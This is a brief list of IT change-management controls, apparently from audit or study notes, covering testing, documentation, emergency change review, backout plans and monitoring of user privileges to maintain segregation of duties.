changes should be thoroughly tested prior to implementation
all documentation should be updated to reflect authorized changes
emergency changes must be documented and subjected to a formal review/approval
backout plans need to be developed for reverting to previous config in case approved changes need to be interrupted or abandoned
user rights and privileges must be carefully monitored during the change process to ensure that proper segregation of duties is maintained. |
|
|
